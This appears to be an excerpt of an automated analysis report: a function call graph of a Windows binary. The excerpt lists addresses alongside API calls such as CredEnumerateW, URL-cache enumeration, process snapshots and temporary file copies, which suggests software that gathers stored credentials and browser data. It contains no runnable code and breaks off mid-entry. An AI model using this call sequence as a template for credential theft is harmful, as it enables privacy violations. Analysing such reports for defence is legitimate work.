41259b wcscpy 38427->38368 38509 40b1ab free free 38428->38509 38430 40ac5c 38433 40a9ce malloc memcpy free free 38430->38433 38434 40ad4b 38430->38434 38436 40ace7 free 38430->38436 38441 40ad76 38430->38441 38513 40a8d0 7 API calls 38430->38513 38514 4099f4 38430->38514 38433->38430 38434->38441 38522 40a9ce 38434->38522 38436->38430 38510 40aa04 38441->38510 38442 40ada2 38444 40adc9 38442->38444 38445 40adaa 38442->38445 38443 40adb3 _wcsicmp 38443->38444 38443->38445 38444->38373 38444->38374 38445->38443 38445->38444 38528 40dce0 38446->38528 38448 40dd3a GetModuleHandleW 38533 40dba7 38448->38533 38452 40dce0 3 API calls 38451->38452 38453 40db99 38452->38453 38605 40dae1 38453->38605 38619 402f3a 38456->38619 38458 412766 38458->38377 38458->38383 38459 4126d3 _wcsicmp 38460 4126a8 38459->38460 38460->38458 38460->38459 38462 41270a 38460->38462 38653 4125f8 7 API calls 38460->38653 38462->38458 38622 411ac5 38462->38622 38473 4125da 38472->38473 38474 4125f0 38473->38474 38475 4125e6 DeleteObject 38473->38475 38477 40b1ab free free 38474->38477 38475->38474 38476->38390 38477->38385 38479 40b640 38478->38479 38480 40b639 free 38478->38480 38481 40b1ab free free 38479->38481 38480->38479 38481->38363 38483 40a83b GetSystemDirectoryW 38482->38483 38484 40a84c wcscpy 38482->38484 38483->38484 38489 409719 wcslen 38484->38489 38487 40a881 LoadLibraryW 38488 40a886 38487->38488 38488->38412 38488->38415 38490 409724 38489->38490 38491 409739 wcscat LoadLibraryW 38489->38491 38490->38491 38492 40972c wcscat 38490->38492 38491->38487 38491->38488 38492->38491 38494 444732 38493->38494 38495 444728 DeleteObject 38493->38495 38505 409cc3 38494->38505 38495->38494 38497 412551 38498 4010f9 38497->38498 38499 401130 38498->38499 38500 401134 GetModuleHandleW LoadIconW 38499->38500 38501 401107 wcsncat 38499->38501 38502 40a7be 38500->38502 38501->38499 38503 40a7d2 38502->38503 38503->38427 38503->38503 38504->38421 38508 409bfd memset wcscpy 38505->38508 38507 409cdb CreateFontIndirectW 38507->38497 38508->38507 38509->38430 38511 40aa14 38510->38511 38512 40aa0a free 38510->38512 38511->38442 38512->38511 38513->38430 38515 409a41 38514->38515 38516 4099fb malloc 38514->38516 38515->38430 38518 409a37 38516->38518 38519 409a1c 38516->38519 38518->38430 38520 409a30 free 38519->38520 38521 409a20 memcpy 38519->38521 38520->38518 38521->38520 38523 40a9e7 38522->38523 38524 40a9dc free 38522->38524 38526 4099f4 3 API calls 38523->38526 38525 40a9f2 38524->38525 38527 40a8d0 7 API calls 38525->38527 38526->38525 38527->38441 38552 409bca GetModuleFileNameW 38528->38552 38530 40dce6 wcsrchr 38531 40dcf5 38530->38531 38532 40dcf9 wcscat 38530->38532 38531->38532 38532->38448 38553 44db70 38533->38553 38537 40dbfd 38556 4447d9 38537->38556 38540 40dc34 wcscpy wcscpy 38582 40d6f5 38540->38582 38541 40dc1f wcscpy 38541->38540 38544 40d6f5 3 API calls 38545 40dc73 38544->38545 38546 40d6f5 3 API calls 38545->38546 38547 40dc89 38546->38547 38548 40d6f5 3 API calls 38547->38548 38549 40dc9c EnumResourceNamesW EnumResourceNamesW wcscpy 38548->38549 38588 40da80 38549->38588 38552->38530 38554 40dbb4 memset memset 38553->38554 38555 409bca GetModuleFileNameW 38554->38555 38555->38537 38558 4447f4 38556->38558 38557 40dc1b 38557->38540 38557->38541 38558->38557 38559 444807 ??2@YAPAXI 38558->38559 38560 44481f 38559->38560 38561 444873 _snwprintf 38560->38561 38562 4448ab wcscpy 38560->38562 38595 44474a 8 API calls 38561->38595 38564 4448bb 38562->38564 38596 44474a 8 API calls 38564->38596 38566 4448a7 38566->38562 38566->38564 38567 4448cd 38597 44474a 8 API calls 38567->38597 38569 4448e2 38598 44474a 8 API calls 38569->38598 38571 4448f7 38599 44474a 8 API calls 38571->38599 38573 44490c 38600 44474a 8 API calls 38573->38600 38575 444921 38601 44474a 8 API calls 38575->38601 38577 444936 38602 44474a 8 API calls 38577->38602 38579 44494b 38603 44474a 8 API calls 38579->38603 38581 444960 ??3@YAXPAX 38581->38557 38583 44db70 38582->38583 38584 40d702 memset GetPrivateProfileStringW 38583->38584 38585 40d752 38584->38585 38586 40d75c WritePrivateProfileStringW 38584->38586 38585->38586 38587 40d758 38585->38587 38586->38587 38587->38544 38589 44db70 38588->38589 38590 40da8d memset 38589->38590 38591 40daac LoadStringW 38590->38591 38592 40dac6 38591->38592 38592->38591 38594 40dade 38592->38594 38604 40d76e memset GetPrivateProfileStringW WritePrivateProfileStringW memset _itow 38592->38604 38594->38377 38595->38566 38596->38567 38597->38569 38598->38571 38599->38573 38600->38575 38601->38577 38602->38579 38603->38581 38604->38592 38615 409b98 GetFileAttributesW 38605->38615 38607 40daea 38608 40db63 38607->38608 38609 40daef wcscpy wcscpy GetPrivateProfileIntW 38607->38609 38608->38379 38616 40d65d GetPrivateProfileStringW 38609->38616 38611 40db3e 38617 40d65d GetPrivateProfileStringW 38611->38617 38613 40db4f 38618 40d65d GetPrivateProfileStringW 38613->38618 38615->38607 38616->38611 38617->38613 38618->38608 38654 40eaff 38619->38654 38623 411ae2 memset 38622->38623 38624 411b8f 38622->38624 38694 409bca GetModuleFileNameW 38623->38694 38636 411a8b 38624->38636 38626 411b0a wcsrchr 38627 411b22 wcscat 38626->38627 38628 411b1f 38626->38628 38695 414770 wcscpy wcscpy wcscpy CreateFileW CloseHandle 38627->38695 38628->38627 38630 411b67 38696 402afb 38630->38696 38634 411b7f 38752 40ea13 SendMessageW memset SendMessageW 38634->38752 38637 402afb 27 API calls 38636->38637 38638 411ac0 38637->38638 38639 4110dc 38638->38639 38640 41113e 38639->38640 38645 4110f0 38639->38645 38777 40969c LoadCursorW SetCursor 38640->38777 38642 411143 38778 4032b4 38642->38778 38796 444a54 38642->38796 38643 4110f7 _wcsicmp 38643->38645 38644 411157 38646 40ada2 _wcsicmp 38644->38646 38645->38640 38645->38643 38799 410c46 10 API calls 38645->38799 38649 411167 38646->38649 38647 4111af 38649->38647 38650 4111a6 qsort 38649->38650 38650->38647 38653->38460 38655 40eb10 38654->38655 38667 40e8e0 38655->38667 38658 40eb6c memcpy memcpy 38662 40ebb7 38658->38662 38659 40ebf2 ??2@YAPAXI ??2@YAPAXI 38661 40ec2e ??2@YAPAXI 38659->38661 38664 40ec65 38659->38664 38660 40d134 16 API calls 38660->38662 38661->38664 38662->38658 38662->38659 38662->38660 38664->38664 38677 40ea7f 38664->38677 38666 402f49 38666->38460 38668 40e8f2 38667->38668 38669 40e8eb ??3@YAXPAX 38667->38669 38670 40e900 38668->38670 38671 40e8f9 ??3@YAXPAX 38668->38671 38669->38668 38672 40e911 38670->38672 38673 40e90a ??3@YAXPAX 38670->38673 38671->38670 38674 40e931 ??2@YAPAXI ??2@YAPAXI 38672->38674 38675 40e921 ??3@YAXPAX 38672->38675 38676 40e92a ??3@YAXPAX 38672->38676 38673->38672 38674->38658 38675->38676 38676->38674 38678 40aa04 free 38677->38678 38679 40ea88 38678->38679 38680 40aa04 free 38679->38680 38681 40ea90 38680->38681 38682 40aa04 free 38681->38682 38683 40ea98 38682->38683 38684 40aa04 free 38683->38684 38685 40eaa0 38684->38685 38686 40a9ce 4 API calls 38685->38686 38687 40eab3 38686->38687 38688 40a9ce 4 API calls 38687->38688 38689 40eabd 38688->38689 38690 40a9ce 4 API calls 38689->38690 38691 40eac7 38690->38691 38692 40a9ce 4 API calls 38691->38692 38693 40ead1 38692->38693 38693->38666 38694->38626 38695->38630 38753 40b2cc 38696->38753 38698 402b0a 38699 40b2cc 27 API calls 38698->38699 38700 402b23 38699->38700 38701 40b2cc 27 API calls 38700->38701 38702 402b3a 38701->38702 38703 40b2cc 27 API calls 38702->38703 38704 402b54 38703->38704 38705 40b2cc 27 API calls 38704->38705 38706 402b6b 38705->38706 38707 40b2cc 27 API calls 38706->38707 38708 402b82 38707->38708 38709 40b2cc 27 API calls 38708->38709 38710 402b99 38709->38710 38711 40b2cc 27 API calls 38710->38711 38712 402bb0 38711->38712 38713 40b2cc 27 API calls 38712->38713 38714 402bc7 38713->38714 38715 40b2cc 27 API calls 38714->38715 38716 402bde 38715->38716 38717 40b2cc 27 API calls 38716->38717 38718 402bf5 38717->38718 38719 40b2cc 27 API calls 38718->38719 38720 402c0c 38719->38720 38721 40b2cc 27 API calls 38720->38721 38722 402c23 38721->38722 38723 40b2cc 27 API calls 38722->38723 38724 402c3a 38723->38724 38725 40b2cc 27 API calls 38724->38725 38726 402c51 38725->38726 38727 40b2cc 27 API calls 38726->38727 38728 402c68 38727->38728 38729 40b2cc 27 API calls 38728->38729 38730 402c7f 38729->38730 38731 40b2cc 27 API calls 38730->38731 38732 402c99 38731->38732 38733 40b2cc 27 API calls 38732->38733 38734 402cb3 38733->38734 38735 40b2cc 27 API calls 38734->38735 38736 402cd5 38735->38736 38737 40b2cc 27 API calls 38736->38737 38738 402cf0 38737->38738 38739 40b2cc 27 API calls 38738->38739 38740 402d0b 38739->38740 38741 40b2cc 27 API calls 38740->38741 38742 402d26 38741->38742 38743 40b2cc 27 API calls 38742->38743 38744 402d3e 38743->38744 38745 40b2cc 27 API calls 38744->38745 38746 402d59 38745->38746 38747 40b2cc 27 API calls 38746->38747 38748 402d78 38747->38748 38749 40b2cc 27 API calls 38748->38749 38750 402d93 38749->38750 38751 4018db GetWindowPlacement memset GetSystemMetrics GetSystemMetrics SetWindowPlacement 38750->38751 38751->38634 38752->38624 38756 40b58d 38753->38756 38755 40b2d1 38755->38698 38757 40b5a4 GetModuleHandleW FindResourceW 38756->38757 38758 40b62e 38756->38758 38759 40b5c2 LoadResource 38757->38759 38761 40b5e7 38757->38761 38758->38755 38760 40b5d0 SizeofResource LockResource 38759->38760 38759->38761 38760->38761 38761->38758 38769 40afcf 38761->38769 38763 40b608 memcpy 38772 40b4d3 memcpy 38763->38772 38765 40b61e 38773 40b3c1 18 API calls 38765->38773 38767 40b626 38774 40b04b 38767->38774 38770 40b04b ??3@YAXPAX 38769->38770 38771 40afd7 ??2@YAPAXI 38770->38771 38771->38763 38772->38765 38773->38767 38775 40b051 ??3@YAXPAX 38774->38775 38776 40b05f 38774->38776 38775->38776 38776->38758 38777->38642 38779 4032c4 38778->38779 38780 40b633 free 38779->38780 38781 403316 38780->38781 38800 44553b 38781->38800 38785 403480 38998 40368c 15 API calls 38785->38998 38787 403489 38788 40b633 free 38787->38788 38789 403495 38788->38789 38789->38644 38790 4033a9 memset memcpy 38791 4033ec wcscmp 38790->38791 38792 40333c 38790->38792 38791->38792 38792->38785 38792->38790 38792->38791 38996 4028e7 11 API calls 38792->38996 38997 40f508 6 API calls 38792->38997 38794 403421 _wcsicmp 38794->38792 38797 444a64 FreeLibrary 38796->38797 38798 444a83 38796->38798 38797->38798 38798->38644 38799->38645 38801 445548 38800->38801 38802 445599 38801->38802 38999 40c768 38801->38999 38803 4455a8 memset 38802->38803 38946 4457f2 38802->38946 39082 403988 38803->39082 38810 445854 38811 4458aa 38810->38811 39207 403c9c memset memset memset memset memset 38810->39207 38813 44594a 38811->38813 38814 4458bb memset memset 38811->38814 38812 445672 39093 403fbe memset memset memset memset memset 38812->39093 38816 4459ed 38813->38816 38817 44595e memset memset 38813->38817 38819 414c2e 16 API calls 38814->38819 38822 445a00 memset memset 38816->38822 38823 445b22 38816->38823 38824 414c2e 16 API calls 38817->38824 38818 4455e5 38818->38812 38836 44560f 38818->38836 38825 4458f9 38819->38825 39230 414c2e 38822->39230 38828 445bca 38823->38828 38829 445b38 memset memset memset 38823->38829 38834 44599c 38824->38834 38835 40b2cc 27 API calls 38825->38835 38846 445c8b memset memset 38828->38846 38896 445cf0 38828->38896 38841 445bd4 38829->38841 38842 445b98 38829->38842 38830 445849 39295 40b1ab free free 38830->39295 38845 40b2cc 27 API calls 38834->38845 38847 445909 38835->38847 38838 4087b3 338 API calls 38836->38838 38857 445621 38838->38857 38840 44589f 39296 40b1ab free free 38840->39296 38854 414c2e 16 API calls 38841->38854 38842->38841 38850 445ba2 38842->38850 38859 4459ac 38845->38859 38848 414c2e 16 API calls 38846->38848 38856 409d1f 6 API calls 38847->38856 38860 445cc9 38848->38860 39368 4099c6 wcslen 38850->39368 38851 4456b2 39283 40b1ab free free 38851->39283 38853 40b2cc 27 API calls 38863 445a4f 38853->38863 38865 445be2 38854->38865 38855 403335 38995 4452e5 45 API calls 38855->38995 38868 445919 38856->38868 39281 4454bf 20 API calls 38857->39281 38858 445823 38858->38830 38876 4087b3 338 API calls 38858->38876 38869 409d1f 6 API calls 38859->38869 38870 409d1f 6 API calls 38860->38870 38861 445879 38861->38840 38880 4087b3 338 API calls 38861->38880 39245 409d1f wcslen wcslen 38863->39245 38874 40b2cc 27 API calls 38865->38874 38866 445d3d 38894 40b2cc 27 API calls 38866->38894 38867 445d88 memset memset memset 38877 414c2e 16 API calls 38867->38877 39297 409b98 GetFileAttributesW 38868->39297 38878 4459bc 38869->38878 38879 445ce1 38870->38879 38871 445bb3 39371 445403 memset 38871->39371 38872 445680 38872->38851 39116 4087b3 memset 38872->39116 38883 445bf3 38874->38883 38876->38858 38886 445dde 38877->38886 39364 409b98 GetFileAttributesW 38878->39364 39388 409b98 GetFileAttributesW 38879->39388 38880->38861 38893 409d1f 6 API calls 38883->38893 38884 445928 38884->38813 39298 40b6ef 38884->39298 38895 40b2cc 27 API calls 38886->38895 38888 4459cb 38888->38816 38905 40b6ef 252 API calls 38888->38905 38892 40b2cc 27 API calls 38898 445a94 38892->38898 38900 445c07 38893->38900 38901 445d54 _wcsicmp 38894->38901 38904 445def 38895->38904 38896->38855 38896->38866 38896->38867 38897 445389 258 API calls 38897->38828 39250 40ae18 38898->39250 38899 44566d 38899->38946 39167 413d4c 38899->39167 38908 445389 258 API calls 38900->38908 38909 445d71 38901->38909 38972 445d67 38901->38972 38903 445665 39282 40b1ab free free 38903->39282 38910 409d1f 6 API calls 38904->38910 38905->38816 38913 445c17 38908->38913 39389 445093 23 API calls 38909->39389 38916 445e03 38910->38916 38912 4456d8 38918 40b2cc 27 API calls 38912->38918 38919 40b2cc 27 API calls 38913->38919 38915 44563c 38915->38903 38921 4087b3 338 API calls 38915->38921 39390 409b98 GetFileAttributesW 38916->39390 38917 40b6ef 252 API calls 38917->38855 38923 4456e2 38918->38923 38924 445c23 38919->38924 38920 445d83 38920->38855 38921->38915 39284 413fa6 _wcsicmp _wcsicmp 38923->39284 38928 409d1f 6 API calls 38924->38928 38926 445e12 38929 445e6b 38926->38929 38933 40b2cc 27 API calls 38926->38933 38931 445c37 38928->38931 39392 445093 23 API calls 38929->39392 38930 4456eb 38936 4456fd memset memset memset memset 38930->38936 38937 4457ea 38930->38937 38938 445389 258 API calls 38931->38938 38932 445b17 39365 40aebe 38932->39365 38940 445e33 38933->38940 39285 409c70 wcscpy wcsrchr 38936->39285 39288 413d29 38937->39288 38944 445c47 38938->38944 38945 409d1f 6 API calls 38940->38945 38942 445e7e 38947 445f67 38942->38947 38950 40b2cc 27 API calls 38944->38950 38951 445e47 38945->38951 38946->38810 39184 403e2d memset memset memset memset memset 38946->39184 38952 40b2cc 27 API calls 38947->38952 38948 445ab2 memset 38953 40b2cc 27 API calls 38948->38953 38955 445c53 38950->38955 39391 409b98 GetFileAttributesW 38951->39391 38957 445f73 38952->38957 38958 445aa1 38953->38958 38954 409c70 2 API calls 38959 44577e 38954->38959 38960 409d1f 6 API calls 38955->38960 38962 409d1f 6 API calls 38957->38962 38958->38932 38958->38948 38963 409d1f 6 API calls 38958->38963 39257 40add4 38958->39257 39262 445389 38958->39262 39271 40ae51 38958->39271 38964 409c70 2 API calls 38959->38964 38965 445c67 38960->38965 38961 445e56 38961->38929 38969 445e83 memset 38961->38969 38966 445f87 38962->38966 38963->38958 38967 44578d 38964->38967 38968 445389 258 API calls 38965->38968 39395 409b98 GetFileAttributesW 38966->39395 38967->38937 38974 40b2cc 27 API calls 38967->38974 38968->38828 38973 40b2cc 27 API calls 38969->38973 38972->38855 38972->38917 38975 445eab 38973->38975 38976 4457a8 38974->38976 38977 409d1f 6 API calls 38975->38977 38978 409d1f 6 API calls 38976->38978 38980 445ebf 38977->38980 38979 4457b8 38978->38979 39287 409b98 GetFileAttributesW 38979->39287 38982 40ae18 9 API calls 38980->38982 38986 445ef5 38982->38986 38984 40ae51 9 API calls 38984->38986 38986->38984 38987 445f5c 38986->38987 38989 40add4 2 API calls 38986->38989 38990 40b2cc 27 API calls 38986->38990 38991 409d1f 6 API calls 38986->38991 38993 445f3a 38986->38993 39393 409b98 GetFileAttributesW 38986->39393 38988 40aebe FindClose 38987->38988 38988->38947 38989->38986 38990->38986 38991->38986 39394 445093 23 API calls 38993->39394 38995->38792 38996->38794 38997->38792 38998->38787 39000 40c775 38999->39000 39396 40b1ab free free 39000->39396 39002 40c788 39397 40b1ab free free 39002->39397 39004 40c790 39398 40b1ab free free 39004->39398 39006 40c798 39007 40aa04 free 39006->39007 39008 40c7a0 39007->39008 39399 40c274 memset 39008->39399 39013 40a8ab 9 API calls 39014 40c7c3 39013->39014 39015 40a8ab 9 API calls 39014->39015 39016 40c7d0 39015->39016 39428 40c3c3 39016->39428 39020 40c877 39029 40bdb0 39020->39029 39021 40c86c 39470 4053fe 39 API calls 39021->39470 39027 40c7e5 39027->39020 39027->39021 39028 40c634 49 API calls 39027->39028 39453 40a706 39027->39453 39028->39027 39663 404363 39029->39663 39032 40bf5d 39683 40440c 39032->39683 39034 40bdee 39034->39032 39037 40b2cc 27 API calls 39034->39037 39035 40bddf CredEnumerateW 39035->39034 39083 40399d 39082->39083 39729 403a16 39083->39729 39086 403a12 wcsrchr 39086->38818 39089 4039a3 39090 4039f4 39089->39090 39092 403a09 39089->39092 39740 40a02c CreateFileW 39089->39740 39091 4099c6 2 API calls 39090->39091 39090->39092 39091->39092 39743 40b1ab free free 39092->39743 39094 414c2e 16 API calls 39093->39094 39095 404048 39094->39095 39096 414c2e 16 API calls 39095->39096 39097 404056 39096->39097 39098 409d1f 6 API calls 39097->39098 39099 404073 39098->39099 39100 409d1f 6 API calls 39099->39100 39101 40408e 39100->39101 39102 409d1f 6 API calls 39101->39102 39103 4040a6 39102->39103 39104 403af5 20 API calls 39103->39104 39105 4040ba 39104->39105 39106 403af5 20 API calls 39105->39106 39107 4040cb 39106->39107 39770 40414f memset 39107->39770 39109 404140 39784 40b1ab free free 39109->39784 39110 4040ec memset 39114 4040e0 39110->39114 39112 404148 39112->38872 39113 4099c6 2 API calls 39113->39114 39114->39109 39114->39110 39114->39113 39115 40a8ab 9 API calls 39114->39115 39115->39114 39797 40a6e6 WideCharToMultiByte 39116->39797 39168 40b633 free 39167->39168 39169 413d65 CreateToolhelp32Snapshot memset Process32FirstW 39168->39169 39170 413f00 Process32NextW 39169->39170 39171 413da5 OpenProcess 39170->39171 39172 413f17 CloseHandle 39170->39172 39173 413eb0 39171->39173 39174 413df3 memset 39171->39174 39172->38912 39173->39170 39176 413ebf free 39173->39176 39177 4099f4 3 API calls 39173->39177 40033 413f27 39174->40033 39176->39173 39177->39173 39179 413e37 GetModuleHandleW 39180 413e1f 39179->39180 39181 413e46 GetProcAddress 39179->39181 39180->39179 40038 413959 39180->40038 40054 413ca4 39180->40054 39181->39180 39183 413ea2 CloseHandle 39183->39173 39185 414c2e 16 API calls 39184->39185 39186 403eb7 39185->39186 39187 414c2e 16 API calls 39186->39187 39188 403ec5 39187->39188 39189 409d1f 6 API calls 39188->39189 39190 403ee2 39189->39190 39191 409d1f 6 API calls 39190->39191 39192 403efd 39191->39192 39193 409d1f 6 API calls 39192->39193 39194 403f15 39193->39194 39195 403af5 20 API calls 39194->39195 39196 403f29 39195->39196 39197 403af5 20 API calls 39196->39197 39198 403f3a 39197->39198 39199 40414f 33 API calls 39198->39199 39205 403f4f 39199->39205 39200 403faf 40068 40b1ab free free 39200->40068 39202 403f5b memset 39202->39205 39203 403fb7 39203->38858 39204 4099c6 2 API calls 39204->39205 39205->39200 39205->39202 39205->39204 39206 40a8ab 9 API calls 39205->39206 39206->39205 39208 414c2e 16 API calls 39207->39208 39209 403d26 39208->39209 39210 414c2e 16 API calls 39209->39210 39211 403d34 39210->39211 39212 409d1f 6 API calls 39211->39212 39213 403d51 39212->39213 39214 409d1f 6 API calls 39213->39214 39215 403d6c 39214->39215 39216 409d1f 6 API calls 39215->39216 39217 403d84 39216->39217 39218 403af5 20 API calls 39217->39218 39219 403d98 39218->39219 39220 403af5 20 API calls 39219->39220 39221 403da9 39220->39221 39222 40414f 33 API calls 39221->39222 39228 403dbe 39222->39228 39223 403e1e 40069 40b1ab free free 39223->40069 39224 403dca memset 39224->39228 39226 403e26 39226->38861 39227 4099c6 2 API calls 39227->39228 39228->39223 39228->39224 39228->39227 39229 40a8ab 9 API calls 39228->39229 39229->39228 39231 414b81 9 API calls 39230->39231 39232 414c40 39231->39232 39233 414c73 memset 39232->39233 40070 409cea 39232->40070 39237 414c94 39233->39237 39236 414c64 39236->38853 40073 414592 RegOpenKeyExW 39237->40073 39239 414cc1 39240 414cf4 wcscpy 39239->39240 40074 414bb0 wcscpy 39239->40074 39240->39236 39242 414cd2 40075 4145ac RegQueryValueExW 39242->40075 39244 414ce9 RegCloseKey 39244->39240 39246 409d43 wcscpy 39245->39246 39248 409d62 39245->39248 39247 409719 2 API calls 39246->39247 39249 409d51 wcscat 39247->39249 39248->38892 39249->39248 39251 40aebe FindClose 39250->39251 39252 40ae21 39251->39252 39253 4099c6 2 API calls 39252->39253 39254 40ae35 39253->39254 39255 409d1f 6 API calls 39254->39255 39256 40ae49 39255->39256 39256->38958 39258 40ade0 39257->39258 39259 40ae0f 39257->39259 39258->39259 39260 40ade7 wcscmp 39258->39260 39259->38958 39260->39259 39261 40adfe wcscmp 39260->39261 39261->39259 39263 40ae18 9 API calls 39262->39263 39269 4453c4 39263->39269 39264 40ae51 9 API calls 39264->39269 39265 4453f3 39266 40aebe FindClose 39265->39266 39268 4453fe 39266->39268 39267 40add4 2 API calls 39267->39269 39268->38958 39269->39264 39269->39265 39269->39267 39270 445403 253 API calls 39269->39270 39270->39269 39272 40ae7b FindNextFileW 39271->39272 39273 40ae5c FindFirstFileW 39271->39273 39274 40ae8f 39272->39274 39275 40ae94 39272->39275 39273->39275 39276 40aebe FindClose 39274->39276 39277 40aeb6 39275->39277 39278 409d1f 6 API calls 39275->39278 39276->39275 39277->38958 39278->39277 39281->38915 39282->38899 39283->38899 39284->38930 39286 409c89 39285->39286 39286->38954 39289 413d39 39288->39289 39290 413d2f FreeLibrary 39288->39290 39291 40b633 free 39289->39291 39290->39289 39292 413d42 39291->39292 39293 40b633 free 39292->39293 39294 413d4a 39293->39294 39294->38946 39295->38810 39296->38811 39297->38884 39299 44db70 39298->39299 39300 40b6fc memset 39299->39300 39301 409c70 2 API calls 39300->39301 39302 40b732 wcsrchr 39301->39302 39303 40b743 39302->39303 39304 40b746 memset 39302->39304 39303->39304 39305 40b2cc 27 API calls 39304->39305 39306 40b76f 39305->39306 39307 409d1f 6 API calls 39306->39307 39308 40b783 39307->39308 40076 409b98 GetFileAttributesW 39308->40076 39310 40b792 39311 409c70 2 API calls 39310->39311 39325 40b7c2 39310->39325 39313 40b7a5 39311->39313 39315 40b2cc 27 API calls 39313->39315 39319 40b7b2 39315->39319 39316 40b837 CloseHandle 39318 40b83e memset 39316->39318 39317 40b817 40111 409a45 GetTempPathW 39317->40111 40110 40a6e6 WideCharToMultiByte 39318->40110 39323 409d1f 6 API calls 39319->39323 39321 40b827 CopyFileW 39321->39318 39323->39325 39324 40b866 39326 444432 121 API calls 39324->39326 40077 40bb98 39325->40077 39327 40b879 39326->39327 39328 40bad5 39327->39328 39329 40b273 27 API calls 39327->39329 39330 40baeb 39328->39330 39331 40bade DeleteFileW 39328->39331 39332 40b89a 39329->39332 39333 40b04b ??3@YAXPAX 39330->39333 39331->39330 39334 438552 134 API calls 39332->39334 39335 40baf3 39333->39335 39336 40b8a4 39334->39336 39335->38813 39337 40bacd 39336->39337 39339 4251c4 137 API calls 39336->39339 39338 443d90 111 API calls 39337->39338 39338->39328 39362 40b8b8 39339->39362 39340 40bac6 40123 424f26 123 API calls 39340->40123 39341 40b8bd memset 40114 425413 17 API calls 39341->40114 39344 425413 17 API calls 39344->39362 39347 40a71b MultiByteToWideChar 39347->39362 39348 40a734 MultiByteToWideChar 39348->39362 39351 40b9b5 memcmp 39351->39362 39352 4099c6 2 API calls 39352->39362 39353 404423 37 API calls 39353->39362 39356 40bb3e memset memcpy 40124 40a734 MultiByteToWideChar 39356->40124 39357 4251c4 137 API calls 39357->39362 39359 40bb88 LocalFree 39359->39362 39362->39340 39362->39341 39362->39344 39362->39347 39362->39348 39362->39351 39362->39352 39362->39353 39362->39356 39362->39357 39363 40ba5f memcmp 39362->39363 40115 4253ef 16 API calls 39362->40115 40116 40b64c SystemTimeToFileTime FileTimeToLocalFileTime 39362->40116 40117 4253af 17 API calls 39362->40117 40118 4253cf 17 API calls 39362->40118 40119 447280 memset 39362->40119 40120 447960 memset memcpy memcpy memcpy 39362->40120 40121 40afe8 ??2@YAPAXI memcpy ??3@YAXPAX 39362->40121 40122 447920 memcpy memcpy memcpy 39362->40122 39363->39362 39364->38888 39366 40aed1 39365->39366 39367 40aec7 FindClose 39365->39367 39366->38823 39367->39366 39369 4099d7 39368->39369 39370 4099da memcpy 39368->39370 39369->39370 39370->38871 39372 40b2cc 27 API calls 39371->39372 39373 44543f 39372->39373 39374 409d1f 6 API calls 39373->39374 39375 44544f 39374->39375 40213 409b98 GetFileAttributesW 39375->40213 39377 445476 39380 40b2cc 27 API calls 39377->39380 39378 44545e 39378->39377 39379 40b6ef 252 API calls 39378->39379 39379->39377 39381 445482 39380->39381 39382 409d1f 6 API calls 39381->39382 39383 445492 39382->39383 40214 409b98 GetFileAttributesW 39383->40214 39385 4454a1 39386 4454b9 39385->39386 39387 40b6ef 252 API calls 39385->39387 39386->38897 39387->39386 39388->38896 39389->38920 39390->38926 39391->38961 39392->38942 39393->38986 39394->38986 39395->38972 39396->39002 39397->39004 39398->39006 39400 414c2e 16 API calls 39399->39400 39401 40c2ae 39400->39401 39471 40c1d3 39401->39471 39406 40c3be 39423 40a8ab 39406->39423 39407 40afcf 2 API calls 39408 40c2fd FindFirstUrlCacheEntryW 39407->39408 39409 40c3b6 39408->39409 39410 40c31e wcschr 39408->39410 39411 40b04b ??3@YAXPAX 39409->39411 39412 40c331 39410->39412 39413 40c35e FindNextUrlCacheEntryW 39410->39413 39411->39406 39414 40a8ab 9 API calls 39412->39414 39413->39410 39415 40c373 GetLastError 39413->39415 39418 40c33e wcschr 39414->39418 39416 40c3ad FindCloseUrlCache 39415->39416 39417 40c37e 39415->39417 39416->39409 39419 40afcf 2 API calls 39417->39419 39418->39413 39420 40c34f 39418->39420 39421 40c391 FindNextUrlCacheEntryW 39419->39421 39422 40a8ab 9 API calls 39420->39422 39421->39410 39421->39416 39422->39413 39587 40a97a 39423->39587 39426 40a8cc 39426->39013 39593 40b1ab free free 39428->39593 39430 40c3dd 39431 40b2cc 27 API calls 39430->39431 39432 40c3e7 39431->39432 39594 414592 RegOpenKeyExW 39432->39594 39434 40c3f4 39435 40c50e 39434->39435 39436 40c3ff 39434->39436 39450 405337 39435->39450 39437 40a9ce 4 API calls 39436->39437 39438 40c418 memset 39437->39438 39595 40aa1d 39438->39595 39441 40c471 39443 40c47a _wcsupr 39441->39443 39442 40c505 RegCloseKey 39442->39435 39597 40a8d0 7 API calls 39443->39597 39445 40c498 39598 40a8d0 7 API calls 39445->39598 39447 40c4ac memset 39448 40aa1d 39447->39448 39449 40c4e4 RegEnumValueW 39448->39449 39449->39442 39449->39443 39599 405220 39450->39599 39454 4099c6 2 API calls 39453->39454 39455 40a714 _wcslwr 39454->39455 39456 40c634 39455->39456 39656 405361 39456->39656 39459 40c65c wcslen 39659 4053b6 39 API calls 39459->39659 39460 40c71d wcslen 39460->39027 39462 40c677 39470->39020 39472 40ae18 9 API calls 39471->39472 39478 40c210 39472->39478 39473 40ae51 9 API calls 39473->39478 39474 40c264 39475 40aebe FindClose 39474->39475 39477 40c26f 39475->39477 39476 40add4 2 API calls 39476->39478 39483 40e5ed memset memset 39477->39483 39478->39473 39478->39474 39478->39476 39479 40c231 _wcsicmp 39478->39479 39480 40c1d3 35 API calls 39478->39480 39479->39478 39481 40c248 39479->39481 39480->39478 39496 40c084 22 API calls 39481->39496 39484 414c2e 16 API calls 39483->39484 39485 40e63f 39484->39485 39486 409d1f 6 API calls 39485->39486 39487 40e658 39486->39487 39497 409b98 GetFileAttributesW 39487->39497 39489 40e667 39490 40e680 39489->39490 39491 409d1f 6 API calls 39489->39491 39498 409b98 GetFileAttributesW 39490->39498 39491->39490 39493 40e68f 39495 40c2d8 39493->39495 39499 40e4b2 39493->39499 39495->39406 39495->39407 39496->39478 39497->39489 39498->39493 39520 40e01e 39499->39520 39501 40e593 39502 40e5b0 39501->39502 39503 40e59c DeleteFileW 39501->39503 39505 40b04b ??3@YAXPAX 39502->39505 39503->39502 39504 40e521 39504->39501 39543 40e175 39504->39543 39506 40e5bb 39505->39506 39508 40e5c4 CloseHandle 39506->39508 39509 40e5cc 39506->39509 39508->39509 39511 40b633 free 39509->39511 39510 40e573 39513 40e584 39510->39513 39514 40e57c CloseHandle 39510->39514 39512 40e5db 39511->39512 39516 40b633 free 39512->39516 39586 40b1ab free free 39513->39586 39514->39513 39515 40e540 39515->39510 39563 40e2ab 39515->39563 39518 40e5e3 39516->39518 39518->39495 39521 406214 22 API calls 39520->39521 39522 40e03c 39521->39522 39523 40e16b 39522->39523 39524 40dd85 74 API calls 39522->39524 39523->39504 39525 40e06b 